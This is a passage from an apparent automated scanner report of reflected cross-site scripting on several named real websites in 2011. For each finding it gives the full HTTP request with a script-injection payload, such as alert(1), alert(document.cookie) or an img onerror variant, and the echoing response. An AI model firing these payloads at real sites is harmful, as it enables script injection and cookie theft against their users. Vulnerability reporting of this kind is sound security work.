Path:   /content/0/16228/124632/728x90_Patch.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dd90'%3balert(1)//80b9ab1df8b was submitted in the mpvc parameter. This input was echoed as 6dd90';alert(1)//80b9ab1df8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16228/124632/728x90_Patch.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-124632-26209-1%3Fmpt%3D33312011918&mpt=33312011918&mpvc=6dd90'%3balert(1)//80b9ab1df8b HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo3=16228:26209

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 13:50:45 GMT
Server: Apache
Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT
ETag: "55537c-d92-49e3c56e64300"
Accept-Ranges: bytes
Content-Length: 3814
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<a href="6dd90';alert(1)//80b9ab1df8bhttp://altfarm.mediaplex.com/ad/ck/16228-124632-26209-1?mpt=33312011918" target="_blank">
...[SNIP]...
4.17. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c95d2"><script>alert(1)</script>3baa62b01e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?c95d2"><script>alert(1)</script>3baa62b01e2=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Apr 2011 01:51:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 117123

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&c95d2"><script>alert(1)</script>3baa62b01e2=1" type="text/css" media="all" />
...[SNIP]...
4.18. http://jqueryui.com/themeroller/css/parseTheme.css.php [c95d2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the c95d2 request parameter is copied into the HTML document as plain text between tags. The payload 6f58e<script>alert(1)</script>05175a80001 was submitted in the c95d2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&c95d26f58e<script>alert(1)</script>05175a80001 HTTP/1.1
Host: jqueryui.com
Proxy-Connection: keep-alive
Referer: http://jqueryui.com/themeroller/?c95d2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3baa62b01e2=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Apr 2011 20:58:15 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 16605


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&c95d26f58e<script>alert(1)</script>05175a80001
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .ui-
...[SNIP]...
4.19. http://jqueryui.com/themeroller/css/parseTheme.css.php [ctl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the ctl request parameter is copied into the HTML document as plain text between tags. The payload f2062<script>alert(1)</script>f22eaa1a584 was submitted in the ctl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themerollerf2062<script>alert(1)</script>f22eaa1a584&c95d2 HTTP/1.1
Host: jqueryui.com
Proxy-Connection: keep-alive
Referer: http://jqueryui.com/themeroller/?c95d2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3baa62b01e2=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Apr 2011 20:58:15 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 16605


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themerollerf2062<script>alert(1)</script>f22eaa1a584&c95d2
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea
...[SNIP]...
4.20. http://jqueryui.com/themeroller/css/parseTheme.css.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a0ccf<script>alert(1)</script>12010d89495 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&c95d2&a0ccf<script>alert(1)</script>12010d89495=1 HTTP/1.1
Host: jqueryui.com
Proxy-Connection: keep-alive
Referer: http://jqueryui.com/themeroller/?c95d2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3baa62b01e2=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Apr 2011 20:58:15 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 16608


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&c95d2&a0ccf<script>alert(1)</script>12010d89495=1
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .u
...[SNIP]...
4.21. http://mochibot.com/my/core.swf [f parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mochibot.com
Path:   /my/core.swf

Issue detail

The value of the f request parameter is copied into the HTML document as plain text between tags. The payload b5679<script>alert(1)</script>d2f3dfe879 was submitted in the f parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/core.swf?mv=8&fv=9&v=WIN%2010%2C2%2C154%2C25&swfid=f0d2fc3a&l=10301&f=_level0b5679<script>alert(1)</script>d2f3dfe879&sb=remote&t=1 HTTP/1.1
Host: mochibot.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/FCWSite/swfs/covhome_new.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Mon, 18 Apr 2011 01:07:47 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 1705
Cache-Control: false
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-MochiAds-Server: 38.102.129.22:80
X-Mochi-Backend: 10.0.0.52:8890
X-Mochi-Source: 10.0.0.239:5991

FWS.....p...........D.....C....?.........*..........System...
..security.N...allowDomain.R.....this........8....REF..http://www.cov.com/FCWSite/swfs/covhome_new.swf.O......sb..remote.O.6....f.._level0b5679<script>alert(1)</script>d2f3dfe879.O.    ....MV..8.O.    ....SV..9.O......TAG..f0d2fc3a.O....__mochibot.......mc.O.....mc.............createEmptyMovieClip.N....u..&.......lv.........createEmptyMovieClip.R..........UL....f....................
...[SNIP]...
4.22. http://mochibot.com/my/core.swf [mv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mochibot.com
Path:   /my/core.swf

Issue detail

The value of the mv request parameter is copied into the HTML document as plain text between tags. The payload 6809b<script>alert(1)</script>3615bf752e4 was submitted in the mv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/core.swf?mv=86809b<script>alert(1)</script>3615bf752e4&fv=9&v=WIN%2010%2C2%2C154%2C25&swfid=f0d2fc3a&l=10301&f=_level0&sb=remote&t=1 HTTP/1.1
Host: mochibot.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/FCWSite/swfs/covhome_new.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Mon, 18 Apr 2011 01:07:23 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 1706
Cache-Control: false
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-MochiAds-Server: 38.102.129.22:80
X-Mochi-Backend: 10.0.0.51:8890
X-Mochi-Source: 10.0.0.238:6946

FWS.....p...........D.....C....?.........*..........System...
..security.N...allowDomain.R.....this........8....REF..http://www.cov.com/FCWSite/swfs/covhome_new.swf.O......sb..remote.O......f.._level0.O.2....MV..86809b<script>alert(1)</script>3615bf752e4.O.    ....SV..9.O......TAG..f0d2fc3a.O....__mochibot.......mc.O.....mc.............createEmptyMovieClip.N....u..&.......lv.........createEmptyMovieClip.R..........UL....f....................NO....f......
...[SNIP]...
4.23. http://mochibot.com/my/core.swf [sb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mochibot.com
Path:   /my/core.swf

Issue detail

The value of the sb request parameter is copied into the HTML document as plain text between tags. The payload 68580<script>alert(1)</script>0f48e44fcb5 was submitted in the sb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/core.swf?mv=8&fv=9&v=WIN%2010%2C2%2C154%2C25&swfid=f0d2fc3a&l=10301&f=_level0&sb=remote68580<script>alert(1)</script>0f48e44fcb5&t=1 HTTP/1.1
Host: mochibot.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/FCWSite/swfs/covhome_new.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Mon, 18 Apr 2011 01:07:54 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 1706
Cache-Control: false
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-MochiAds-Server: 38.102.129.22:80
X-Mochi-Backend: 10.0.0.50:8890
X-Mochi-Source: 10.0.0.238:22552

FWS.....p...........D.....C....?.........*..........System...
..security.N...allowDomain.R.....this........8....REF..http://www.cov.com/FCWSite/swfs/covhome_new.swf.O.7....sb..remote68580<script>alert(1)</script>0f48e44fcb5.O......f.._level0.O.    ....MV..8.O.    ....SV..9.O......TAG..f0d2fc3a.O....__mochibot.......mc.O.....mc.............createEmptyMovieClip.N....u..&.......lv.........createEmptyMovieClip.R..........UL....f..
...[SNIP]...
4.24. http://mochibot.com/my/core.swf [swfid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mochibot.com
Path:   /my/core.swf

Issue detail

The value of the swfid request parameter is copied into the HTML document as plain text between tags. The payload a37aa<script>alert(1)</script>27710bb0d94 was submitted in the swfid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/core.swf?mv=8&fv=9&v=WIN%2010%2C2%2C154%2C25&swfid=f0d2fc3aa37aa<script>alert(1)</script>27710bb0d94&l=10301&f=_level0&sb=remote&t=1 HTTP/1.1
Host: mochibot.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/FCWSite/swfs/covhome_new.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Mon, 18 Apr 2011 01:07:35 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 1706
Cache-Control: false
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-MochiAds-Server: 38.102.129.22:80
X-Mochi-Backend: 10.0.0.52:8890
X-Mochi-Source: 10.0.0.238:6293

FWS.....p...........D.....C....?.........*..........System...
..security.N...allowDomain.R.....this........8....REF..http://www.cov.com/FCWSite/swfs/covhome_new.swf.O......sb..remote.O......f.._level0.O.    ....MV..8.O.    ....SV..9.O.:....TAG..f0d2fc3aa37aa<script>alert(1)</script>27710bb0d94.O....__mochibot.......mc.O.....mc.............createEmptyMovieClip.N....u..&.......lv.........createEmptyMovieClip.R..........UL....f....................NO....f....................this........    ..9....
...[SNIP]...
4.25. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 41dfa<script>alert(1)</script>421997a1394 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/Users/crawler/Documents/bz-business-xss-report.html41dfa<script>alert(1)</script>421997a1394 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 18 Apr 2011 11:44:18 GMT
Via: NS-CACHE: 100
Etag: "a4c227b786b5e878b80c2c371140d97551e4d5db"
Content-Length: 147
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Mon, 18 Apr 2011 11:54:17 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/Users/crawler/Documents/bz-business-xss-report.html41dfa<script>alert(1)</script>421997a1394", "diggs": 0});
4.26. http://www.arnoldporter.com/industries.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /industries.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74e88"><script>alert(1)</script>61945f5a1e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries.cfm?u=HomelandSecurity&action=view&id=312&74e88"><script>alert(1)</script>61945f5a1e2=1 HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
Referer: http://www.arnoldporter.com/industries.cfm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24313245; CFTOKEN=69495883; sifrFetch=true; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.2.10.1303088780

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:10:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Homeland Security</title>
       <meta name="Description
...[SNIP]...
<input type="hidden" name="74e88"><script>alert(1)</script>61945f5a1e2" value="1" />
...[SNIP]...
4.27. http://www.arnoldporter.com/industries.cfm [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /industries.cfm

Issue detail

The value of the nsextt request parameter is copied into the HTML document as plain text between tags. The payload 45217<script>alert(1)</script>d6041dca3d8 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries.cfm?u=HomelandSecurity&action=view&id=312&nsextt=%22%3E%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E45217<script>alert(1)</script>d6041dca3d8 HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24313245; CFTOKEN=69495883; sifrFetch=true; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.3.10.1303088780

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:12:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Homeland Security</title>
       <meta name="Description
...[SNIP]...
</script>45217<script>alert(1)</script>d6041dca3d8" />
...[SNIP]...
4.28. http://www.arnoldporter.com/industries.cfm [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /industries.cfm

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3db8"><script>alert(1)</script>8c88d7c7546 was submitted in the u parameter. This input was echoed as e3db8\"><script>alert(1)</script>8c88d7c7546 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries.cfm?u=HomelandSecuritye3db8"><script>alert(1)</script>8c88d7c7546&action=view&id=312 HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
Referer: http://www.arnoldporter.com/industries.cfm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24313245; CFTOKEN=69495883; sifrFetch=true; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.2.10.1303088780

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:10:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Homeland Security</title>
       <meta name="Description
...[SNIP]...
<input type="hidden" name="u" value="HomelandSecuritye3db8\"><script>alert(1)</script>8c88d7c7546" />
...[SNIP]...
4.29. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f41b"><script>alert(1)</script>34db911561f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?a=bsf_product&5f41b"><script>alert(1)</script>34db911561f=1 HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: barra_tracking_code=bsf_product; path=/
Set-Cookie: locale=+; expires=Mon, 18-Apr-2011 23:17:02 GMT
Set-Cookie: locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; path=/
Set-Cookie: barra_hidden_menus=a%3A0%3A%7B%7D; expires=Wed, 18-May-2011 23:25:22 GMT; path=/
Date: Mon, 18 Apr 2011 23:25:21 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="5f41b"><script>alert(1)</script>34db911561f" value="1" />
...[SNIP]...
4.30. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e4a2"><script>alert(1)</script>81bf7a8d344 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/?a=bsf_product&L=en&8e4a2"><script>alert(1)</script>81bf7a8d344=1 HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: barra_tracking_code=bsf_product; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: barra_tracking_code=bsf_product; path=/
Set-Cookie: locale=+; expires=Mon, 18-Apr-2011 23:16:55 GMT
Set-Cookie: locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; path=/
Set-Cookie: barra_hidden_menus=a%3A0%3A%7B%7D; expires=Wed, 18-May-2011 23:25:15 GMT; path=/
Date: Mon, 18 Apr 2011 23:25:15 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="8e4a2"><script>alert(1)</script>81bf7a8d344" value="1" />
...[SNIP]...
4.31. http://www.curtis.com/emaildisclaimer.cfm [itemID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The value of the itemID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd71"><img%20src%3da%20onerror%3dalert(1)>d7938553f63 was submitted in the itemID parameter. This input was echoed as 4fd71"><img src=a onerror=alert(1)>d7938553f63 in the application's response.

